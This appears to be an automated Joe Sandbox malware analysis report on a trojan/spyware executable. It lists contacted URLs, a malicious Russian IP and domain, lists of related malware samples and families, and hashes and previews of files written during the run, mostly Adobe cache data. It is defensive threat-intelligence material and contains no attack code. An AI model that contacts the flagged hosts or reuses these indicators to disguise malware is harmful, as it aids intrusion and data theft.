http://java.sun.com/products/plugin/index.html#download	Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	false	high
http://forum.uvnc.com	Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	false	unknown
http://ocsp.thawte.com0	Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.190.152.201	tbdcic.info	Russian Federation		41615	RSHB-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579877
Start date and time:	2024-12-23 13:28:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Olz7TmvkEW.exe renamed because original name is a hash value
Original Sample Name:	cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651.exe
Detection:	MAL
Classification:	mal84.troj.spyw.evad.winEXE@50/46@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 23.195.39.65, 2.19.198.27, 23.32.239.56, 23.32.239.9, 13.107.246.63, 20.190.177.22, 23.218.208.109, 18.213.11.84, 20.199.58.43, 23.41.168.139, 172.202.163.200, 2.16.158.48, 150.171.27.10, 2.16.158.58
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, login.live.com, a122.dscd.akamai.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, geo2.adobe.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Olz7TmvkEW.exe

Simulations

Behavior and APIs

Time	Type	Description
07:29:23	API Interceptor	1x Sleep call for process: AcroCEF.exe modified
07:29:56	API Interceptor	3073213x Sleep call for process: sync_browser.exe modified
07:30:08	API Interceptor	65x Sleep call for process: timeout.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ax-0001.ax-msedge.net	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	150.171.28.10
	BVGvbpplT8.exe	Get hash	malicious	LummaC, Stealc	Browse	150.171.28.10
	613vKYuY2S.exe	Get hash	malicious	LummaC	Browse	150.171.28.10
	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	150.171.28.10
	vRWw6y4Pj2.exe	Get hash	malicious	Unknown	Browse	150.171.27.10
	2E814B7D-3F0B-4AF7-8C7C-C8AE7CD57525_12172024125634383.dll	Get hash	malicious	Unknown	Browse	150.171.28.10
	fKdiT1D1dk.exe	Get hash	malicious	RHADAMANTHYS	Browse	150.171.27.10
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	150.171.28.10
	uDTW3VjJJT.exe	Get hash	malicious	LummaC, Stealc	Browse	150.171.27.10
	BB4S2ErvqK.exe	Get hash	malicious	LummaC	Browse	150.171.28.10
bg.microsoft.map.fastly.net	eszstwQPwq.ps1	Get hash	malicious	LockBit ransomware, Metasploit	Browse	199.232.210.172
	0vM02qWRT9.ps1	Get hash	malicious	LockBit ransomware, Metasploit	Browse	199.232.210.172
	#U5b89#U88c5#U52a9#U624b_2.0.8.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	fiFdIrd.txt.js	Get hash	malicious	Unknown	Browse	199.232.210.172
	5XXofntDiN.exe	Get hash	malicious	LummaC	Browse	199.232.210.172
	p3a0oZ4U7X.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	lKin1m7Pf2.lnk	Get hash	malicious	Unknown	Browse	199.232.210.172
	fKdiT1D1dk.exe	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	#U5b89#U88c5#U52a9#U624b_1.0.8.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	Support.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RSHB-ASRU	Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	document.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	tiago.exe	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	0EZ9Ho3Ruc.exe	Get hash	malicious	RedLine	Browse	194.190.152.148
	Paralysis Hack.exe	Get hash	malicious	zgRAT	Browse	194.190.153.137
	file.exe	Get hash	malicious	000Stealer	Browse	194.190.152.193
	EgNIXduB6T.exe	Get hash	malicious	Erbium Stealer	Browse	194.190.152.194
	2MNB4UhUqR.exe	Get hash	malicious	RedLine	Browse	194.190.152.20
	w9d568i4Ia.exe	Get hash	malicious	DCRat	Browse	194.190.152.128

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.971824627296864
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
MD5:	F326539D084B03D88254A74D6018F692
SHA1:	395B367E0E3554C3E78A8211F2D4B9F0F427CA87
SHA-256:	9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
SHA-512:	C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.971824627296864
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
MD5:	F326539D084B03D88254A74D6018F692
SHA1:	395B367E0E3554C3E78A8211F2D4B9F0F427CA87
SHA-256:	9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
SHA-512:	C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223122917Z-195.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
Category:	dropped
Size (bytes):	66934
Entropy (8bit):	2.436424201832609
Encrypted:	false
SSDEEP:	384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
MD5:	EDF4BC620FE407C6970CDAF5585ADE74
SHA1:	FF838C5205409B571B5FA183F69EEAAE321F9AE6
SHA-256:	9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
SHA-512:	84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
Malicious:	false
Preview:	BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.444859185243817
Encrypted:	false
SSDEEP:	384:ye6ci5thiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mys3OazzU89UTTgUL
MD5:	8F840CF93CFA33F75DB904BD3EAB01DE
SHA1:	87BDAA6B51E6B11D00C9415DB74CAA2403D4DD98
SHA-256:	293A514532FC9FFFCD8A5C3E2445AD7BAA3F85C2606C96EDC2C85DAA1D7EAFFA
SHA-512:	4CA9C6DD6AA27C25AC2413840905AFD197F57A9E49FE12D22D22B66D943FDD77CDF581BA01E187B5AE302A52092936332D6B7288020407912EEF3A2CCE591AD3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.7683978792074293
Encrypted:	false
SSDEEP:	48:7MkJioyViYioyftoy1C7oy16oy1pxKOioy1noy1AYoy1Wioy1oioykioyBoy1noP:73JuJviXjBiRb9IVXEBodRBkC
MD5:	E4ABB1988E44EC3BC0CE5079F528E030
SHA1:	2A68DC1A1D1BC3A19163C950876967917957A8F1
SHA-256:	EB0D2B16DB85923B0106279E2BEE26F6A6C2CD21B245BF5265DE2B4251A6C457
SHA-512:	EB245B745478CCA3F96326E5F07C4E2FFE2C045C26B3BD2E2DCCA503F94CCA0C2477847AC97C88EFE8D64503BA2F481F9351D61342C65FE55AE713F6FCC24B27
Malicious:	false
Preview:	.... .c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7381013623686155
Encrypted:	false
SSDEEP:	3:kkFklOtl1fllXlE/HT8ksXzXNNX8RolJuRdxLlGB9lQRYwpDdt:kKXX2T8/NMa8RdWBwRd
MD5:	5C149C7457CD81BE43556F2622233BF1
SHA1:	6643C13BDE8D901CD60197AC5498BDE1EB21C8D3
SHA-256:	FC2D95504DB7C6C1F7E8CC49771074002FD525A4063D6B428C9EFDDEB597819F
SHA-512:	2B8FE3AE99D9FA5DA6E32ADFD08692658D99DD7A636D0BB3C96944C324211DDE28CC6E0CDB17CCA15DF87E4EDA3D300985B896362844318AD42543B43C6F8AA1
Malicious:	false
Preview:	p...... ........}.WL6U..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.351310406990786
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJM3g98kUwPeUkwRe9:YvXKXbOlpSGcDicXYGMbLUkee9
MD5:	4BC212132E7D4606B0CD715BCC4B4140
SHA1:	B88301E1CD01FF140C0FB0283E45B4D7BF8513FB
SHA-256:	322D9E20595152349B6B2D6FF9F76916DA554EB3D07CE0BCFD65CDD7C628D6A4
SHA-512:	BB53DA67EFE5EA7EDFC3F44E2E386956A71429637B7D8100A8031163945C6942BB7628903D15E641B7CF97874F58E6BA9D5EC4E29032396B3358AF1C75727BC4
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.301803258609371
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfBoTfXpnrPeUkwRe9:YvXKXbOlpSGcDicXYGWTfXcUkee9
MD5:	95D3B6A8C98F9E24D9A17A2ECEB4BE52
SHA1:	D105D0F2F1C7CE682F3AAA29BEB8CD40C085DB9B
SHA-256:	0EFDA2D9EEB4824F19F26EDA330E482A8A44962A7D723D336472183D4A460EB9
SHA-512:	50352EF4F9597A2E56230B79C6F21C8AAD97F5C6E63CBA507EC4C9D476CDEFC00CDBBD8279A4A2568680F247BE5CE2A5C979D3C328CEB4E5304C0D71E5A5B9C7
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.280624333654969
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfBD2G6UpnrPeUkwRe9:YvXKXbOlpSGcDicXYGR22cUkee9
MD5:	103A81507560B18DD3FB49240661342E
SHA1:	B610E833C1A62AA6DC9F836CF4DF5D168287FB2B
SHA-256:	AE86F5DDB2A73B10F21897C99551FB5A924BE0A07DDB2CD644504EA37BAC4E4A
SHA-512:	0AF1AAB390A90F0813EA062D49F80D07A6FBB9D96599362ADD46AED7659C27B3D7213E561707B8245994E2F65391D4844924D61F12F24F551ADBEDE2B9E60B72
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.330910071099409
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfPmwrPeUkwRe9:YvXKXbOlpSGcDicXYGH56Ukee9
MD5:	02C62B39EBE948CE5F67B8D47242C63D
SHA1:	093EF78E76C5F9F88E56CD679AB1F2981B94AB4C
SHA-256:	4CA9EF0448AA05815BCFB3D33A949CEA5DAD13B64024C24E233C280C402565FC
SHA-512:	5006BD24A1005316181BCC6F58D7E8787EB71FEBBA0E99597B18DA0ACAFB595051B2940BCEDB64D716E004EAEAFCCAAFF19D514E0B8F8496E49D38A6F129E0B2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.6831892511679
Encrypted:	false
SSDEEP:	24:Yv6XCl47+cX1pLgE9cQx8LennAvzBvkn0RCmK8czOCCSSY:Yvt+X1hgy6SAFv5Ah8cv/SY
MD5:	81F86A83B6D6656B4956FE41528CA98D
SHA1:	EDAB7917CF5F261375FCFE20680F876EF6165FFF
SHA-256:	EEC5D0EE6876FF8419C220108E61D8A5E13D8AEC1D44B1DBC9235A4570089E72
SHA-512:	6FF279045EDF4A0F8D884B23B195E0D1E53B755558549CEE84206BFEAEABC8B85400CB3E3D4C70A59C5378E47738E96DFF4F4BAB4A759570149452E77718161B
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.27729979570658
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJf8dPeUkwRe9:YvXKXbOlpSGcDicXYGU8Ukee9
MD5:	BA164A25AFAC73C5511D02A0D4E0C59B
SHA1:	5CEF22FD8C29CA784899E50D368B92005B059AC1
SHA-256:	A0D11F4254BF0AFAF77D7B496641CABAACFFE647BF331712CF493CD5F895472F
SHA-512:	1933666BF1AA9D7C2B03A7F933D55910AAE62530B6259E4546275993DC5ED663E64AA8108EA2A1F3185A0B87EF7C8942D48B4EA359424B892CE808164B5663E9
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.279910642397763
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfQ1rPeUkwRe9:YvXKXbOlpSGcDicXYGY16Ukee9
MD5:	3407C8503EBFAF3791880606C57121BB
SHA1:	604A7CA4392FC204F337068F75323067C694FB6D
SHA-256:	B9CFE9C8043ACC8F70CAB71C9D6DA6DA25F746FD45F70461F65127FB1FA69675
SHA-512:	71D7FA17FAC72E9020CED6F232F9CED5729C2F3EF90702523A7D40AF6F5C01707C999161F75361EDBEECB464719128AB847420B8CBEA12B769D0683D691BA2C2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.286232842997864
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfFldPeUkwRe9:YvXKXbOlpSGcDicXYGz8Ukee9
MD5:	60FC416DE0A46B3222D8EBB4D259968E
SHA1:	3A400E9BAC60E0A77D8428192C52D4D98EBB4951
SHA-256:	22C2011FB85EE0AB383757F95A4E96A5DA136D402CD8D7F22C3DA0F5E0D2D6A6
SHA-512:	FDDF056D32E73D96BBC8A8515E8F62DDFAE96CC4E6D9C54055AC2FB61DD2EEAAB3D872240DCEB352F60812DBB3C913B5AE1532B2F5B4F9DACD432D437DE4D6FE
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.304166227732885
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfzdPeUkwRe9:YvXKXbOlpSGcDicXYGb8Ukee9
MD5:	59F16EB17CCC808F1C1F7DD847F71BB1
SHA1:	CC23C8A0E3D0544275FF2C3777D10C5AAB38C716
SHA-256:	891B159A4280321DA6DB440238155039746CF8B3D9FA630A93AF31B33CB91CCB
SHA-512:	25A527213BA3E7AEC265D7F39C06AA56256E82277026454484D8AF528AEED8BA4171D8351F05979A8CEEBC36E3863BCD9DF684D73D81E89DE663561C17EB50E1
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

